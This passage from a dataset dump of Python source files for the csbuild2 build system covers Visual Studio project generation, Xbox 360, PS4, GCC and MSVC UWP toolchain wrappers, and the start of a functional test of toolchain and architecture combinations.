csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: List of include search paths.\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\t\treturn []\n\n\t@staticmethod\n\tdef GetIntellisensePreprocessorDefinitions(project, buildSpec):\n\t\t\"\"\"\n\t\tGet a list of any platform-specific preprocessor definitions needed by intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: List of preprocessor definitions.\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\t\treturn []\n\n\t@staticmethod\n\tdef GetIntellisenseAdditionalOptions(project, buildSpec): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tGet any additional NMake options to configure intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: Additional NMake options.\n\t\t:rtype: str or None\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\t\treturn \"\"\n\n\tdef WriteGlobalHeader(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite any top-level information about this platform at the start of the project file.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteGlobalFooter(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite any final data nodes needed by the project.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteGlobalImportTargets(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite global import target needed for the project.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteProjectConfiguration(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the project configuration nodes for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tprojectConfigXmlNode = self._addXmlNode(parentXmlNode, \"ProjectConfiguration\")\n\t\tprojectConfigXmlNode.set(\"Include\", vsBuildTarget)\n\n\t\tconfigXmlNode = self._addXmlNode(projectConfigXmlNode, \"Configuration\")\n\t\tconfigXmlNode.text = vsConfig\n\n\t\tplatformXmlNode = self._addXmlNode(projectConfigXmlNode, \"Platform\")\n\t\tplatformXmlNode.text = vsPlatformName\n\n\tdef WriteConfigPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group nodes for the project's configuration and platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteImportProperties(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite any special import properties for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\t_ignore(project)\n\t\t_ignore(buildSpec)\n\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\timportGroupXmlNode = self._addXmlNode(parentXmlNode, \"ImportGroup\")\n\t\timportGroupXmlNode.set(\"Label\", \"PropertySheets\")\n\t\timportGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\timportXmlNode = self._addXmlNode(importGroupXmlNode, \"Import\")\n\t\timportXmlNode.set(\"Label\", \"LocalAppDataPlatform\")\n\t\timportXmlNode.set(\"Project\", r\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\")\n\t\timportXmlNode.set(\"Condition\", r\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\")\n\n\tdef WriteUserDebugPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group nodes specifying the user debug settings.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tpass\n\n\tdef WriteExtraPropertyGroupBuildNodes(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite extra property group nodes related to platform build properties.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tpass\n" }, { "alpha_fraction": 0.6101759076118469, "alphanum_fraction": 0.6265075206756592, "avg_line_length": 33.60869598388672, "blob_id": "da715e5ced1a34dabdf1208c30e6fdc144b41f8e", "content_id": "a3665f63a9b6678bb4f4bfe7eb227fdefeecfc15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7960, "license_type": "no_license", "max_line_length": 117, "num_lines": 230, "path": "/csbuild/tools/common/xbox_360_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: xbox_360_tool_base\n\t:synopsis: Base tools for the Xbox 360 tool implementations.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom abc import ABCMeta\n\nfrom csbuild import commands, log\n\nfrom .tool_traits import HasOptimizationLevel\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\n\n@MetaClass(ABCMeta)\nclass Xbox360BaseTool(Tool):\n\t\"\"\"\n\tParent class for all Xbox 360 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._xbox360SdkPath = projectSettings.get(\"xbox360SdkPath\", None)\n\n\t\tself._xbox360BinPath = None # type: str or None\n\t\tself._xbox360LibPath = None # type: str or None\n\t\tself._xbox360IncludePath = None # type: str or None\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetXbox360SdkPath(path):\n\t\t\"\"\"\n\t\tSet the path to the Xbox 360 SDK.\n\n\t\t:param path: Path to the Xbox 360 SDK.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"xbox360SdkPath\", os.path.abspath(path) if path else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._xbox360SdkPath:\n\t\t\tself._xbox360SdkPath = os.getenv(\"XEDK\", None)\n\n\t\tassert self._xbox360SdkPath, \"No Xbox 360 SDK path has been set\"\n\t\tassert os.access(self._xbox360SdkPath, os.F_OK), \"Xbox 360 SDK path does not exist: {}\".format(self._ps3SdkPath)\n\n\t\tself._xbox360SdkPath = os.path.abspath(self._xbox360SdkPath)\n\n\t\tself._xbox360BinPath = os.path.join(self._xbox360SdkPath, \"bin\", \"win32\")\n\t\tself._xbox360LibPath = os.path.join(self._xbox360SdkPath, \"lib\", \"xbox\")\n\t\tself._xbox360IncludePath = os.path.join(self._xbox360SdkPath, \"include\", \"xbox\")\n\n\nclass Xbox360ImageXexTool(Xbox360BaseTool):\n\t\"\"\"\n\tTool that converts a compiled executable for Xbox 360 into a XEX image capable of running on hardware.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"xcpu\" }\n\tinputFiles = { \".exe\", \".dll\" }\n\toutputFiles = { \".xex\" }\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tXbox360BaseTool.__init__(self, projectSettings)\n\n\t\tself._exePath = None\n\n\t\tself._xexConfigPath = projectSettings.get(\"xbox360XexConfigPath\", None)\n\t\tself._xexImageFlags = projectSettings.get(\"xbox360imageFlags\", [])\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetXbox360ImageConfigFile(path):\n\t\t\"\"\"\n\t\tSet the path to the Xbox 360 XEX config file.\n\t\tThe properties in this file will override any flags that are set manually\n\n\t\t:param path: Path to the XEX config file.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"xbox360XexConfigPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetXbox360ImageFlags(*flags):\n\t\t\"\"\"\n\t\tAdd flags to pass to the XEX image conversion program.\n\n\t\t:param flags: List of XEX image flags.\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"xbox360imageFlags\", flags)\n\n\n\t################################################################################\n\t### Internal methods\n\t################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tinputFileExtSplit = os.path.splitext(os.path.basename(inputFile.filename))\n\t\toutputFilePath = os.path.join(\n\t\t\tproject.outputDir,\n\t\t\t\"{}.xex\".format(inputFileExtSplit[0])\n\t\t)\n\t\treturn tuple({ outputFilePath })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmdExe = self._getExeName()\n\t\tcmd = [cmdExe] \\\n\t\t\t+ self._getDefaultArgs() \\\n\t\t\t+ self._getInputArgs(inputFile) \\\n\t\t\t+ self._getOutputArgs(project, inputFile) \\\n\t\t\t+ self._getTitleConfigArgs() \\\n\t\t\t+ self._getMiscArgs()\n\n\t\treturn cmd\n\n\tdef _getExeName(self):\n\t\treturn os.path.join(self._xbox360BinPath, \"imagexex.exe\")\n\n\tdef _getDefaultArgs(self):\n\t\treturn [\"/nologo\"]\n\n\tdef _getInputArgs(self, inputFile):\n\t\targ = \"/IN:{}\".format(inputFile.filename)\n\t\treturn [arg]\n\n\tdef _getOutputArgs(self, project, inputFile):\n\t\targ = \"/OUT:{}\".format(self._getOutputFiles(project, inputFile)[0])\n\t\treturn [arg]\n\n\tdef _getTitleConfigArgs(self):\n\t\targs = []\n\n\t\tif self._xexConfigPath:\n\t\t\targs.append(\"/CONFIG:{}\".format(self._xexConfigPath))\n\n\t\treturn args\n\n\tdef _getMiscArgs(self):\n\t\treturn self._xexImageFlags\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tXbox360BaseTool.SetupForProject(self, project)\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Building XEX image for {} ({}-{}-{})...\",\n\t\t\tos.path.basename(inputFile.filename),\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n" }, { "alpha_fraction": 0.6753016114234924, "alphanum_fraction": 0.6816891431808472, "avg_line_length": 35.59740447998047, "blob_id": "0cdfd7904f2d0eace72b7ea8a9675dca7e74e8da", "content_id": "98ec075858d9aaa1c6cfd3562dbb49d7261ced6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2818, "license_type": "no_license", "max_line_length": 117, "num_lines": 77, "path": "/csbuild/tools/cpp_compilers/ps4_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps4_cpp_compiler\n\t:synopsis: Implementation of the PS4 C/C++ compiler tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .gcc_cpp_compiler import GccCppCompiler\n\nfrom ..common.sony_tool_base import Ps4BaseTool\n\nclass Ps4CppCompiler(Ps4BaseTool, GccCppCompiler):\n\t\"\"\"\n\tPS4 C/C++ compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x64\" }\n\toutputFiles = { \".o\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs4BaseTool.__init__(self, projectSettings)\n\t\tGccCppCompiler.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getComplierName(self, project, isCpp):\n\t\tbinPath = os.path.join(self._ps4SdkPath, \"host_tools\", \"bin\")\n\t\texeName = \"orbis-clang++.exe\" if isCpp else \"orbis-clang.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\"-fPIC\"] if project.projectType == csbuild.ProjectType.SharedLibrary else []\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = GccCppCompiler._getIncludeDirectoryArgs(self)\n\n\t\t# Add the PS4 system include directories.\n\t\targs.extend([\n\t\t\t\"-I{}\".format(os.path.join(self._ps4SdkPath, \"target\", \"include\")),\n\t\t\t\"-I{}\".format(os.path.join(self._ps4SdkPath, \"target\", \"include_common\")),\n\t\t])\n\n\t\treturn args\n\n\tdef SetupForProject(self, project):\n\t\tPs4BaseTool.SetupForProject(self, project)\n\t\tGccCppCompiler.SetupForProject(self, project)\n" }, { "alpha_fraction": 0.6230876445770264, "alphanum_fraction": 0.6286509037017822, "avg_line_length": 33.90291213989258, "blob_id": "d62ceab45fce124e0d02ab1e1122952e5f8b23da", "content_id": "4f6bb2cf4574481dfed10dca1922f02b8de16d9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3595, "license_type": "no_license", "max_line_length": 117, "num_lines": 103, "path": "/csbuild/tools/assemblers/gcc_assembler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: gcc_assembler\n\t:synopsis: GCC assember tool\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .assembler_base import AssemblerBase\n\nclass GccAssembler(AssemblerBase):\n\t\"\"\"\n\tGCC assembler implementation\n\t\"\"\"\n\tsupportedArchitectures = {\"x86\", \"x64\", \"arm\", \"arm64\"}\n\tinputFiles={\".s\", \".S\"}\n\toutputFiles = {\".o\"}\n\n\tdef __init__(self, projectSettings):\n\t\tAssemblerBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmd = [self._getComplierName()] \\\n\t\t\t+ self._getInputFileArgs(inputFile) \\\n\t\t\t+ self._getDefaultArgs(project) \\\n\t\t\t+ self._getCustomArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getArchitectureArgs(project)\n\n\t\treturn [arg for arg in cmd if arg]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self):\n\t\treturn \"gcc\"\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\"--pass-exit-codes\"]\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"-fPIC\")\n\t\treturn args\n\n\tdef _getCustomArgs(self):\n\t\treturn self._asmFlags\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", \"{}\".format(inputFile.filename)]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", \"{}\".format(outputFiles[0])]\n\n\tdef _getPreprocessorArgs(self):\n\t\treturn [\"-D{}\".format(d) for d in self._defines]\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\treturn [\"-I{}\".format(d) for d in self._includeDirectories]\n\n\tdef _getArchitectureArgs(self, project):\n\t\targs = {\n\t\t\t\"x86\": [\"-m32\"],\n\t\t\t\"x64\": [\"-m64\"],\n\t\t}.get(project.architectureName, [])\n\t\treturn args\n" }, { "alpha_fraction": 0.668639063835144, "alphanum_fraction": 0.6706114411354065, "avg_line_length": 37.26415252685547, "blob_id": "63a86116f5ae13e576d92472ed21c1899ca37e79", "content_id": "2ec5c29be06c5909a26cef1648edcb0d7ef191cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2028, "license_type": "no_license", "max_line_length": 117, "num_lines": 53, "path": "/csbuild/tools/assemblers/msvc_uwp_assembler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_uwp_assembler\n\t:synopsis: MSVC assembler tool to build apps for the Universal Windows Platform.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom .msvc_assembler import MsvcAssembler\n\ndef _ignore(_):\n\tpass\n\nclass MsvcUwpAssembler(MsvcAssembler):\n\t\"\"\"\n\tMSVC assembler tool to build apps for the Universal Windows Platform.\n\t\"\"\"\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcAssembler.__init__(self, projectSettings)\n\n\t\t# Enable UWP builds so the base tool setups up the toolchain backend properly.\n\t\tself._enableUwp = True\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getUwpArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n" }, { "alpha_fraction": 0.6859813332557678, "alphanum_fraction": 0.6885981559753418, "avg_line_length": 50.44230651855469, "blob_id": "672d2167bf318871427ba88cd27aec440a681ff3", "content_id": "09b3c2d335d9c4fa556a8810c722ea963b9ebd34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5350, "license_type": "no_license", "max_line_length": 136, "num_lines": 104, "path": "/functional_tests/toolchain_architecture_combinations_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test to make sure that invalid toolchain/architecture/platform/target combinations all function as expected\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild import log\nimport platform\nimport os\n\nclass ToolchainArchitectureTest(FunctionalTest):\n\t\"\"\"Test combinations of toolchains, architectures, platforms, and targets\"\"\"\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tFunctionalTest.setUp(self, cleanAtEnd=False)\n\n\tdef tearDown(self):\n\t\tif os.path.exists(\"out\"):\n\t\t\tfor filename in os.listdir(\"out\"):\n\t\t\t\tos.remove(os.path.join(\"out\", filename))\n\t\t\tos.rmdir(\"out\")\n\t\tFunctionalTest.tearDown(self)\n\n\tdef testValidCombinations(self):\n\t\t\"\"\"Test various combinations, they should all succeed\"\"\"\n\t\tfor toolchain in [\"A\", \"B\", \"C\", \"D\", platform.system()]:\n\t\t\tfor target in [\"A\", \"B\", \"special\"]:\n\t\t\t\tfor architecture in [\"A\", \"B\", \"C\", \"D\", \"E\"]:\n\t\t\t\t\tif architecture == \"E\" and toolchain != \"D\":\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tself.assertMakeSucceeds(\"--toolchain\", toolchain, \"--target\", target, \"--architecture\", architecture, \"-v\")\n\t\t\t\t\tlog.Test(\"Created {}\", os.listdir(\"out\"))\n\n\t\t\t\t\tif target != \"special\":\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/foo.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/foo.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tif architecture in [\"A\", \"B\", \"C\"]:\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/arch.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/arch.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/arch2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/arch2.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tif target == 